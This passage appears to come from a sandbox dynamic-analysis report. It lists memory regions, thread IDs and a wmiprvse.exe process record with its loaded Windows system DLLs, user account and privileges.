name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 1992
start_va = 0x3690000
end_va = 0x369ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003690000"
filename = ""
Region:
id = 1993
start_va = 0x74c50000
end_va = 0x74c55fff
entry_point = 0x74c50000
region_type = mapped_file
name = "wmsgapi.dll"
filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll")
Region:
id = 1994
start_va = 0x6d4e0000
end_va = 0x6d4e9fff
entry_point = 0x6d4e0000
region_type = mapped_file
name = "wups.dll"
filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll")
Region:
id = 3792
start_va = 0xf90000
end_va = 0xf9dfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f90000"
filename = ""
Region:
id = 3793
start_va = 0xfa0000
end_va = 0xfa0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000fa0000"
filename = ""
Region:
id = 3794
start_va = 0xff0000
end_va = 0xff0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ff0000"
filename = ""
Region:
id = 3795
start_va = 0x1000000
end_va = 0x1007fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001000000"
filename = ""
Region:
id = 3796
start_va = 0x11d0000
end_va = 0x11dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000011d0000"
filename = ""
Region:
id = 3797
start_va = 0x11e0000
end_va = 0x11effff
entry_point = 0x0
region_type = private
name = "private_0x00000000011e0000"
filename = ""
Region:
id = 3798
start_va = 0x11f0000
end_va = 0x11fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000011f0000"
filename = ""
Region:
id = 3799
start_va = 0x1200000
end_va = 0x1200fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 3800
start_va = 0x1210000
end_va = 0x1211fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001210000"
filename = ""
Region:
id = 3801
start_va = 0x1310000
end_va = 0x1310fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001310000"
filename = ""
Region:
id = 3802
start_va = 0x1320000
end_va = 0x132ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001320000"
filename = ""
Region:
id = 3803
start_va = 0x13f0000
end_va = 0x13f7fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013f0000"
filename = ""
Region:
id = 3804
start_va = 0x1400000
end_va = 0x140ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 3805
start_va = 0x1410000
end_va = 0x141ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 3806
start_va = 0x14a0000
end_va = 0x14affff
entry_point = 0x14a0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 3807
start_va = 0x14b0000
end_va = 0x14bffff
entry_point = 0x14b0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 3808
start_va = 0x1500000
end_va = 0x150ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 3809
start_va = 0x1510000
end_va = 0x1517fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001510000"
filename = ""
Region:
id = 3810
start_va = 0x15a0000
end_va = 0x15affff
entry_point = 0x0
region_type = private
name = "private_0x00000000015a0000"
filename = ""
Region:
id = 3811
start_va = 0x15b0000
end_va = 0x15bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000015b0000"
filename = ""
Region:
id = 3812
start_va = 0x17c0000
end_va = 0x17c7fff
entry_point = 0x0
region_type = private
name = "private_0x00000000017c0000"
filename = ""
Region:
id = 3813
start_va = 0x17d0000
end_va = 0x17dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000017d0000"
filename = ""
Region:
id = 3814
start_va = 0x1910000
end_va = 0x191ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001910000"
filename = ""
Region:
id = 3815
start_va = 0x1920000
end_va = 0x192ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001920000"
filename = ""
Region:
id = 3816
start_va = 0x1930000
end_va = 0x193ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001930000"
filename = ""
Region:
id = 3817
start_va = 0x1940000
end_va = 0x194ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001940000"
filename = ""
Region:
id = 3818
start_va = 0x1950000
end_va = 0x195ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001950000"
filename = ""
Region:
id = 3819
start_va = 0x1960000
end_va = 0x196ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001960000"
filename = ""
Region:
id = 3820
start_va = 0x1dd0000
end_va = 0x1e0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001dd0000"
filename = ""
Region:
id = 3821
start_va = 0x24c0000
end_va = 0x24cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000024c0000"
filename = ""
Region:
id = 3822
start_va = 0x24d0000
end_va = 0x24dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000024d0000"
filename = ""
Region:
id = 3823
start_va = 0x24e0000
end_va = 0x24effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000024e0000"
filename = ""
Region:
id = 3824
start_va = 0x24f0000
end_va = 0x24fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000024f0000"
filename = ""
Region:
id = 3825
start_va = 0x2500000
end_va = 0x250ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002500000"
filename = ""
Region:
id = 3826
start_va = 0x2510000
end_va = 0x251ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002510000"
filename = ""
Region:
id = 3827
start_va = 0x3230000
end_va = 0x326ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003230000"
filename = ""
Region:
id = 3828
start_va = 0x34a0000
end_va = 0x359ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000034a0000"
filename = ""
Region:
id = 3829
start_va = 0x35a0000
end_va = 0x35dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000035a0000"
filename = ""
Region:
id = 3830
start_va = 0x35e0000
end_va = 0x361ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000035e0000"
filename = ""
Region:
id = 3831
start_va = 0x36a0000
end_va = 0x379ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000036a0000"
filename = ""
Region:
id = 3832
start_va = 0x37a0000
end_va = 0x389ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000037a0000"
filename = ""
Region:
id = 3833
start_va = 0x38a0000
end_va = 0x399ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000038a0000"
filename = ""
Region:
id = 3834
start_va = 0x39a0000
end_va = 0x3a9ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000039a0000"
filename = ""
Region:
id = 3835
start_va = 0x3aa0000
end_va = 0x3b9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003aa0000"
filename = ""
Region:
id = 3836
start_va = 0x3ba0000
end_va = 0x4b9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ba0000"
filename = ""
Region:
id = 3837
start_va = 0x6d350000
end_va = 0x6d482fff
entry_point = 0x6d350000
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 3838
start_va = 0x7ff80000
end_va = 0x7ff80fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff80000"
filename = ""
Region:
id = 3839
start_va = 0x7ff81000
end_va = 0x7ff81fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff81000"
filename = ""
Region:
id = 3840
start_va = 0x9a0000
end_va = 0x9a0fff
entry_point = 0x9a0000
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")
Region:
id = 3841
start_va = 0x9b0000
end_va = 0x9cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000009b0000"
filename = ""
Region:
id = 3842
start_va = 0x1af0000
end_va = 0x1b2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001af0000"
filename = ""
Region:
id = 3843
start_va = 0x4d70000
end_va = 0x4daffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004d70000"
filename = ""
Region:
id = 3844
start_va = 0x4f70000
end_va = 0x4faffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004f70000"
filename = ""
Region:
id = 3845
start_va = 0x4fb0000
end_va = 0x53affff
entry_point = 0x0
region_type = private
name = "private_0x0000000004fb0000"
filename = ""
Region:
id = 3846
start_va = 0x6f250000
end_va = 0x6f2b0fff
entry_point = 0x6f250000
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Thread:
id = 9
os_tid = 0x6dc
Thread:
id = 10
os_tid = 0x6d4
Thread:
id = 11
os_tid = 0x6fc
Thread:
id = 12
os_tid = 0x564
Thread:
id = 13
os_tid = 0x4c8
Thread:
id = 14
os_tid = 0x6b8
Thread:
id = 15
os_tid = 0x6b4
Thread:
id = 16
os_tid = 0x66c
Thread:
id = 17
os_tid = 0x6a0
Thread:
id = 18
os_tid = 0x5e4
Thread:
id = 19
os_tid = 0x12c
Thread:
id = 20
os_tid = 0x7f4
Thread:
id = 21
os_tid = 0x7e4
Thread:
id = 22
os_tid = 0x7cc
Thread:
id = 23
os_tid = 0x7c8
Thread:
id = 24
os_tid = 0x7c4
Thread:
id = 25
os_tid = 0x7b8
Thread:
id = 26
os_tid = 0x7b4
Thread:
id = 27
os_tid = 0x7b0
Thread:
id = 28
os_tid = 0x7ac
Thread:
id = 29
os_tid = 0x798
Thread:
id = 30
os_tid = 0x554
Thread:
id = 31
os_tid = 0x50c
Thread:
id = 32
os_tid = 0x4d8
Thread:
id = 33
os_tid = 0x4ac
Thread:
id = 34
os_tid = 0x4a8
Thread:
id = 35
os_tid = 0x484
Thread:
id = 36
os_tid = 0x46c
Thread:
id = 37
os_tid = 0x464
Thread:
id = 38
os_tid = 0x3e0
Thread:
id = 39
os_tid = 0x3dc
Thread:
id = 40
os_tid = 0x3d0
Thread:
id = 41
os_tid = 0x3bc
Thread:
id = 42
os_tid = 0x3b8
Thread:
id = 43
os_tid = 0x368
Thread:
id = 44
os_tid = 0x358
Thread:
id = 45
os_tid = 0x354
Thread:
id = 46
os_tid = 0x350
Thread:
id = 47
os_tid = 0x344
Thread:
id = 48
os_tid = 0x33c
Thread:
id = 49
os_tid = 0xa54
Thread:
id = 50
os_tid = 0xa58
Thread:
id = 86
os_tid = 0xad0
Thread:
id = 87
os_tid = 0xad4
Thread:
id = 99
os_tid = 0xb18
Thread:
id = 100
os_tid = 0xb1c
Thread:
id = 101
os_tid = 0xb30
Thread:
id = 102
os_tid = 0xb34
Thread:
id = 103
os_tid = 0xb38
Thread:
id = 104
os_tid = 0xb3c
Thread:
id = 105
os_tid = 0xb40
Thread:
id = 106
os_tid = 0xb44
Thread:
id = 107
os_tid = 0xb48
Thread:
id = 108
os_tid = 0xb4c
Thread:
id = 109
os_tid = 0xb50
Thread:
id = 110
os_tid = 0xb54
Thread:
id = 111
os_tid = 0xb58
Thread:
id = 113
os_tid = 0xb60
Thread:
id = 114
os_tid = 0xb64
Thread:
id = 115
os_tid = 0xb68
Thread:
id = 156
os_tid = 0xcb8
Thread:
id = 157
os_tid = 0xcbc
Thread:
id = 158
os_tid = 0xcc0
Thread:
id = 191
os_tid = 0xe28
Thread:
id = 192
os_tid = 0xe30
Thread:
id = 193
os_tid = 0xe34
Thread:
id = 194
os_tid = 0xe38
Thread:
id = 195
os_tid = 0xe3c
Thread:
id = 196
os_tid = 0xe40
Thread:
id = 197
os_tid = 0xe44
Thread:
id = 198
os_tid = 0xe2c
Thread:
id = 205
os_tid = 0xe80
Thread:
id = 212
os_tid = 0xeb4
Thread:
id = 247
os_tid = 0xff0
Thread:
id = 248
os_tid = 0xff4
Thread:
id = 249
os_tid = 0xff8
Thread:
id = 250
os_tid = 0xffc
Thread:
id = 251
os_tid = 0x7bc
Thread:
id = 252
os_tid = 0x24c
Thread:
id = 256
os_tid = 0x77c
Thread:
id = 286
os_tid = 0x720
Thread:
id = 294
os_tid = 0x3e4
Thread:
id = 321
os_tid = 0x8dc
Thread:
id = 328
os_tid = 0x930
Thread:
id = 329
os_tid = 0x928
Thread:
id = 338
os_tid = 0x900
Process:
id = "4"
image_name = "wmiprvse.exe"
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
page_root = "0x7f1be5c0"
os_pid = "0xa5c"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "3"
os_parent_pid = "0x338"
cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Network Service"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00048f0f" [0xc000000f]
Region:
id = 565
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 566
start_va = 0x30000
end_va = 0x6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 567
start_va = 0x70000
end_va = 0x73fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 568
start_va = 0x80000
end_va = 0x80fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 569
start_va = 0x6f0000
end_va = 0x730fff
entry_point = 0x6f0000
region_type = mapped_file
name = "wmiprvse.exe"
filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")
Region:
id = 570
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 571
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 572
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 573
start_va = 0x7ffd4000
end_va = 0x7ffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd4000"
filename = ""
Region:
id = 574
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 575
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 576
start_va = 0x90000
end_va = 0xf6fff
entry_point = 0x90000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 577
start_va = 0x160000
end_va = 0x25ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 578
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 579
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 580
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 581
start_va = 0x350000
end_va = 0x35ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 582
start_va = 0x6e280000
end_va = 0x6e28efff
entry_point = 0x6e280000
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 583
start_va = 0x6e590000
end_va = 0x6e5a7fff
entry_point = 0x6e590000
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 584
start_va = 0x6e5b0000
end_va = 0x6e645fff
entry_point = 0x6e5b0000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 585
start_va = 0x6e780000
end_va = 0x6e7dbfff
entry_point = 0x6e780000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 586
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 587
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 588
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 589
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 590
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 591
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 592
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 593
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 594
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 595
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 596
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 597
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 598
start_va = 0x260000
end_va = 0x327fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000260000"
filename = ""
Region:
id = 599
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 600
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 601
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 602
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 603
start_va = 0x110000
end_va = 0x14ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 604
start_va = 0x150000
end_va = 0x156fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 605
start_va = 0x330000
end_va = 0x331fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000330000"
filename = ""
Region:
id = 606
start_va = 0x360000
end_va = 0x460fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000360000"
filename = ""
Region:
id = 607
start_va = 0x470000
end_va = 0x4effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 608
start_va = 0x520000
end_va = 0x55ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000520000"
filename = ""
Region:
id = 609
start_va = 0x560000
end_va = 0x5dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000560000"
filename = ""
Region:
id = 610
start_va = 0x740000
end_va = 0xa0efff
entry_point = 0x740000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 611
start_va = 0xa10000
end_va = 0xe02fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a10000"
filename = ""
Region:
id = 612
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 613
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 614
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 615
start_va = 0x340000
end_va = 0x340fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 616
start_va = 0x4f0000
end_va = 0x4f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004f0000"
filename = ""
Region:
id = 617
start_va = 0x5e0000
end_va = 0x6dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 618
start_va = 0xef0000
end_va = 0xf2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ef0000"
filename = ""
Region:
id = 619
start_va = 0xf60000
end_va = 0xf9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f60000"
filename = ""
Region:
id = 620
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 621
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 622
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 623
start_va = 0x500000
end_va = 0x500fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000500000"
filename = ""
Region:
id = 624
start_va = 0x6e580000
end_va = 0x6e589fff
entry_point = 0x6e580000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 625
start_va = 0xe50000
end_va = 0xe8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 626
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 627
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 628
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 629
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 630
start_va = 0x10e0000
end_va = 0x111ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000010e0000"
filename = ""
Region:
id = 631
start_va = 0x1190000
end_va = 0x11cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001190000"
filename = ""
Region:
id = 632
start_va = 0x6e450000
end_va = 0x6e45efff
entry_point = 0x6e450000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 633
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 634
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 635
start_va = 0x1130000
end_va = 0x116ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001130000"
filename = ""
Region:
id = 636
start_va = 0x6e3e0000
end_va = 0x6e3f6fff
entry_point = 0x6e3e0000
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 637
start_va = 0x7ffd9000
end_va = 0x7ffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd9000"
filename = ""
Region:
id = 638
start_va = 0x6cf60000
end_va = 0x6d0a9fff
entry_point = 0x6cf60000
region_type = mapped_file
name = "cimwin32.dll"
filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll")
Region:
id = 639
start_va = 0x6f8d0000
end_va = 0x6f904fff
entry_point = 0x6f8d0000
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 640
start_va = 0x73e00000
end_va = 0x73e0cfff
entry_point = 0x73e00000
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 641
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3847
start_va = 0x1200000
end_va = 0x123ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 3848
start_va = 0x6cdf0000
end_va = 0x6cdf6fff
entry_point = 0x6cdf0000
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 3849
start_va = 0x7ffd8000
end_va = 0x7ffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd8000"
filename = ""
Region:
id = 3850
start_va = 0x6cf50000
end_va = 0x6cf52fff
entry_point = 0x6cf50000
region_type = mapped_file
name = "security.dll"
filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll")
Region:
id = 3851
start_va = 0x74f80000
end_va = 0x74f87fff
